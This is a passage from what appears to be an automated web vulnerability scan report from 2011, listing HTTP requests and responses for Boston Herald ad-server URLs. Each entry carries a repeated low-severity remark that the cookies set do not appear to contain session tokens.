HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 21:57:29 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:16 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=x15&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:57 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 395 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=x16&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 415 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:07 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011Pizw3O101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 500 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n'); document.write ('<iframe src="http://d3.zedo.com/jsc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:19 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:34 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n' ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:36 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __qca=P0-1247593866-1296251843767
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:19 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:02 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n' ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:53 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:59 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:48:46 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n' ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: application/x-javascript Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/
document.write ('<script language="JavaScript">\n'); document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n') ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1 Host: oascentral.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 22:31:17 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1484 Content-Type: application/x-javascript
document.write ('<!-- begin ad tag-->\n'); document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.co ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
